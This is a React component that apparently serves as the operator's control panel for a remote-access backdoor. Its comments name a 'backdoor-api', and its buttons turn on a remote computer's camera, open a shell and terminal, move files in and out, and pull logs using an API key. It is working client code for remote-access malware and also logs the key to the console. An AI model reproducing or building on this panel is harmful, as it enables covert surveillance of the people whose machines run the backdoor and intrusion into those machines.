import React from "react";
import { useEffect, useState } from "react";
import axios from 'axios';
import { FontAwesomeIcon } from '@fortawesome/react-fontawesome'
import { faPlus, faHeartPulse, faHourglassHalf, faPlay, faStop, faCamera, faTerminal, faList, faFileLines, faRotate, faSatelliteDish, faPowerOff, faCircleExclamation, faVideo} from '@fortawesome/free-solid-svg-icons';

// User defined components
import TerminalModal from "../terminalModal/terminalModal";
import downUpModal from "../downUpModal/downUpModal";
// import './remoteSideBar.css';

function RemoteSideBar(props) {
    const [data, setData] = useState(null);
    const [url, setUrl] = useState(null);
    const [cmdItems, setCmdItem] = useState(null);

    // User pings remote computer for status check
    const apiStatus = async () => {
        const output = document.createElement("li");

        const response = await axios.get(
            `https://${data.props.domainName}:${data.props.port}/api/status`, 
            {}, 
            // Security Vulnerability
            { "Content-Type": "application/json" }
        );

        if(response.status === 200) {
            // console.log("status online");
            output.innerText = "Status: Online";
            output.style = "background-color: #2eb82e; list-style-type: none; text-align: center; padding: 5px; font-weight: 600; border-radius: 10px; margin-bottom: 5px;";
            document.getElementById("outputbox").appendChild(output);
        } else {
            // console.log("status offline");
            output.innerText = "Status: Offline";
            output.style = "background-color: #ff3300; list-style-type: none; text-align: center; padding: 5px; font-weight: 600; border-radius: 10px; margin-bottom: 5px";
            document.getElementById("outputbox").appendChild(output);
        }
    }

    // User activates the Camera on the remote computer
    const camera = async () => {
        const output = document.createElement("li");

        const response = await axios.post(
            `https://${data.props.domainName}:${data.props.port}/api/camera`, 
            {}, 
            // Security Vulnerability
            { "headers": {"apiKey": data.props.apiKey}, "Content-Type": "application/json" }
        );

        if(response.status === 200) {
            // console.log("status online");
            output.innerText = "Camera On";
            output.style = "background-color: #2eb82e; list-style-type: none; text-align: center; padding: 5px; font-weight: 600; border-radius: 10px; margin-bottom: 5px;";
            document.getElementById("outputbox").appendChild(output);
        } else {
            // console.log("status offline");
            output.innerText = "Camera Failed";
            output.style = "background-color: #ff3300; list-style-type: none; text-align: center; padding: 5px; font-weight: 600; border-radius: 10px; margin-bottom: 5px";
            document.getElementById("outputbox").appendChild(output);
        }
    }

    // User Downloads backdoor-api logs of remote computer
    const apiLogs = async () => {
        const output = document.createElement("li");

        console.log(data.props.apiKey);

        const response = await axios.post(
            `https://${data.props.domainName}:${data.props.port}/api/logs`,
            {},
            { "headers": {"apiKey": data.props.apiKey}, "Content-Type": "blob" }
        );

        if(response.status === 200) {
            const url = window.URL.createObjectURL(new Blob([response.data]));
            const link = document.createElement('a');
            link.href = url;
            link.setAttribute('download', "logs.json"); //or any other extension
            document.body.appendChild(link);
            link.click();

            output.innerText = "Grabbed Logs";
            output.style = "background-color: #2eb82e; list-style-type: none; text-align: center; padding: 5px; font-weight: 600; border-radius: 10px; margin-bottom: 5px;";
            document.getElementById("outputbox").appendChild(output);
        } else {
            // console.log("status offline");
            output.innerText = "Logs Failed";
            output.style = "background-color: #ff3300; list-style-type: none; text-align: center; padding: 5px; font-weight: 600; border-radius: 10px; margin-bottom: 5px";
            document.getElementById("outputbox").appendChild(output);
        }
    }
    
    useEffect(() => {
        console.log(`props: ${JSON.stringify(props)}`);
        setData(props);
        // setUrl(`https://${props.props.domainName}:${props.props.port}`);

        const temp = [];

        const shellItem = React.createElement(TerminalModal, {key: "shell", name: "Shell", url: `https://${props.props.domainName}:${props.props.port}`, apiKey: props.props.apiKey});
        const terminalItem = React.createElement(TerminalModal, {key: "terminal", name: "Terminal", url: `https://${props.props.domainName}:${props.props.port}`, apiKey: props.props.apiKey});
        const downloadItem = React.createElement(downUpModal, {key: "download", name: "Download", url: `https://${props.props.domainName}:${props.props.port}`, apiKey: props.props.apiKey});
        const uploadItem = React.createElement(downUpModal, {key: "upload", name: "Upload", url: `https://${props.props.domainName}:${props.props.port}`, apiKey: props.props.apiKey});

        temp.push(shellItem);
        temp.push(terminalItem);
        temp.push(downloadItem);
        temp.push(uploadItem);
        setCmdItem(temp);
    }, []);

    return(
        <aside className="flex column border rounded margin-t-lg max-width-lg">
            <section className=" flex justify-content-cntr align-items-cntr border-bottom rounded bg-color-border padding-sm">
                <h2 className="h4">Commands</h2>
            </section>

            <section className="flex column padding-sm rounded">
                <ul id="commandList" className="flex row justify-content-cntr align-items-cntr">
                    <button className='height-40px width-40px flex row justify-content-cntr align-items-cntr bg-color-background border rounded hover-cursor border-color-foreground' onClick={apiStatus} data-toggle="tooltip" data-placement="bottom" title="Status of Device"><FontAwesomeIcon icon={faHeartPulse} size='2xl' color='hotpink' /></button>
                    <button className='height-40px width-40px flex row justify-content-cntr align-items-cntr bg-color-background border rounded hover-cursor border-color-foreground' onClick={camera} value='camera' data-toggle="tooltip" data-placement="bottom" title="Take a Picture"><FontAwesomeIcon icon={faCamera} size='2xl' color='yellow' /></button>
                    {cmdItems}
                    <button className='height-40px width-40px flex row justify-content-cntr align-items-cntr bg-color-background border rounded hover-cursor border-color-foreground' onClick={apiLogs} value='logs' data-toggle="tooltip" data-placement="bottom" title="Get Logs"><FontAwesomeIcon icon={faFileLines} size='2xl' color='white' /></button>
                    {/* <li className="padding-xs bg-color-primary-2 hover-bg-primary-2 hover-cursor align-txt-cntr rounded margin-b-xs" onClick={apiLogs}>Logs</li> */}
                </ul>
            </section>
        </aside>
    );
}

export default RemoteSideBar;